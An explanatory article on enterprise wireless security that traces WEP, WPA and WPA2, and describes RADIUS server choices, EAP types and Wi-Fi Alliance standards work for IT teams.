Today's IT teams spend countless hours keeping wireless enterprise networks safe from the perils that permeate the radio waves.
Passive eavesdroppers can gather proprietary information, logins, and passwords. Intruders can steal bandwidth to transmit spam or use a network as a springboard to attack others. Even a low-tech attacker can harm a business by launching packet floods against its access points (APs) and nearby server.
At the start of the millennium, the Wired Equivalent Privacy (WEP) security protocol provided security for wireless enterprises by encrypting data so that it was protected during transmission between endpoints. WEP used secret keys to encrypt data moving between the AP and receiving stations. Unfortunately, a decade ago, researchers discovered a flaw in WEP that allowed packet eavesdropping to recover the encryption key. Once developed into an exploit, software running on any off-the-shelf laptop could crack WEP in a matter of minutes. Inevitably, WEP was replaced in 2003 by the Wi-Fi Protected Access (WPA) security protocol and security certification program.
WPA: Deepening security authentication
WPA (referred to as the draft IEEE 802.11i standard) addressed most of the known vulnerabilities of WEP. Primarily intended for wireless enterprise networks, WPA implemented several significant changes.
First, it included the Extensible Authentication Protocol (EAP), which was built on a secure public-key encryption system so that only authorized network users could access the network. Second, WPA improved data encryption through the Temporal Key Integrity Protocol (TKIP); it scrambled the keys using a hashing algorithm to prevent tampering. Finally, a message-integrity check (MIC) feature was added to determine whether a hacker captured or altered packets passing between the access point and client.
Within the year, however, a flaw was found in WPA that relied on older weaknesses in WEP and limitations of the MIC feature.
WPA2: Tightening the encryption
Available since 2004, WPA2 implements the mandatory elements of the IEEE 802.11i standard. And beginning in March 2006, WPA2 certification by the Wi-Fi Alliance became required for all new devices to bear the Wi-Fi trademark.
WPA2 introduces the use of AES (Advanced Encryption Standard) algorithms and CCMP (Counter Cipher Mode with Block-Chaining Message Authentication Code Protocol) to tighten the security of both home networks and business enterprises. Dynamic encryption keys are distributed securely after a user logs in or provides a valid digital certificate. WPA2 can be implemented in one of two modes:
- Pre-Shared Key (PSK) Mode – For home Wi-Fi networks, the owner defines the encryption passphrase on the wireless router and other APs. That passphrase must then be entered by users when connecting to the network.
- Enterprise Mode – Organizations that want government-grade wireless security should use Wi-Fi Protected Access 2 Enterprise (WPA2-Enterprise). To improve the resiliency of mission-critical networks, WPA2-Enterprise was recently enhanced with Protected Management Frames, which further steal WPA2 against eavesdropping and packet forging. All Wi-Fi Certified devices support WPA2 for added protection.
WPA2-Enterprise deployment includes installing a RADIUS server (or establishing an outsourced service), configuring access points with the encryption and RADIUS server information, configuring your operating system with the encryption and IEEE 802.1x settings, and then connecting to your secure wireless enterprise.
Enterprise authentication and communication: The RADIUS server and EAP
The standard for passing EAP over a network is IEEE 802.1x. In this authentication framework, the user who wants to be authenticated is the supplicant. The RADIUS (remote authentication dial-in user service) server doing the authentication is the authentication server, and the device at the AP, such as a laptop or smartphone, is the authenticator.
Users are assigned login credentials to enter when connecting to the network; they don't see the actual encryption keys, and the keys aren't stored on the device. This protects the wireless network against terminated employees or lost devices. The authentication is port-based so that when a user attempts to connect to the network, communication is allowed through a virtual port for the transfer of login credentials. If authentication is successful, encryption keys are securely passed out and the user receives full access.
RADIUS server options
Once you decide on which of the following RADIUS server options to use, you will set it up in the corresponding EAP, AP, and user settings.
- Windows Server -- if you have a Windows Server set up, you can use either the Internet Authentication Service (IAS) in Windows Server 2003 or the Network Policy Server (NPS) in Windows Server 2008.
- FreeRADIUS -- this server is a free open source project and the preferred choice of advanced IT personnel. It is available for the Linux, Mac OS X, and Windows platforms.
- Outsourced Services -- if you have multiple offices or lack technical IT expertise, a hosting service is a good option. Many services provide more than just RADIUS server hosting. They can also help with the setup process, do user on-boarding, and provide real-time reporting functionality. In addition, many companies offer mobile applications that make configuring mobile devices quick and painless for Apple iOS, Android, and Kindle Fire users. Check out No Wires Security and ServerPlus to learn more.
Your EAP choice depends on the level of security you need and your server/client specs. Although there are more than ten EAP types, these three are the most popular:
- PEAP (Protected EAP) -- this protocol authenticates users through the usernames and passwords they enter when connecting to the network. It is one of the easiest EAP types to implement.
- TLS (Transport Layer Security) -- although this EAP type requires more time to implement and maintain, TLS is very secure because both client and server validation is done with SSL (secure socket layer) certificates. Instead of connecting to the network with usernames and passwords, end-user devices or computers must have an SSL certificate file. You control the certificate authority and distribute the client certificates.
- TTLS (Tunneled TLS) -- this version of TLS doesn't require security certificates and reduces network management time. However, because TTLS doesn't have native support in Microsoft Windows, it requires a third-party client.
The steps for configuring the APs with the encryption and RADIUS server information -- and for configuring your operating system with the IEEE 802.1x setting -- depend on your server and client specs. Consult your hardware and software manufacturers for guidance.
Standards and the Wi-Fi Alliance
There's no end to the task of protecting against data theft and managing risk and compliance in the wireless enterprise. Key challenges in wireless security vary widely and continue to evolve because every enterprise is different. Some IT teams struggle with the impact of BYOD (bring your own device) while others seek ways to allow guest access without compromising security of mission-critical systems. The IEEE 802.11 working group and Wi-Fi Alliance continue to address emerging enterprise needs in the space as best they can. In addition, major platform vendors often provide ways to assist in the management of security measures, helping to reduce the resources needed and overall time spent on IT management.
Wi-Fi continues to grow and adapt to business needs. While 2.4 GHz may be the norm in modern wireless networking, IEEE 802.11 specifications provide for many more options. Wireless network products using the Wi-Fi brand may operate in the 2.4, 3.6, 5, and 60 GHz frequency bands. Published in December 2013, amendment IEEE 802.11ac builds on IEEE 802.11n (October 2009) to include wider channels in the 5 GHz band, more spatial streams, higher order modulation, and the addition of multi-user MIMO (multiple input/multiple output).
"The emergence of IEEE 802.11ac doesn't necessitate changes in the current industry-standard security protocols," says Kevin Robinson, director of program marketing for the Wi-Fi Alliance. "Wi-Fi CERTIFIED 'ac' does present an opportunity for enterprises using old equipment to migrate to a newer infrastructure and depart from earlier security mechanisms."
The Wi-Fi Alliance is in the early stages of developing a certification program known as Suite B for a set of encryption methods focused on encryption, key exchange, and related technologies for securing ultra-sensitive security domains. Suite B will likely be the next level of wireless protection. Until then, we have Wi-Fi with WPA2 and Protected Management Frames, which should suffice for the vast majority of modern organizations.
Make sure your group has adopted the latest technologies described here. Enjoy the convenience and productivity of Wi-Fi, but do it safely.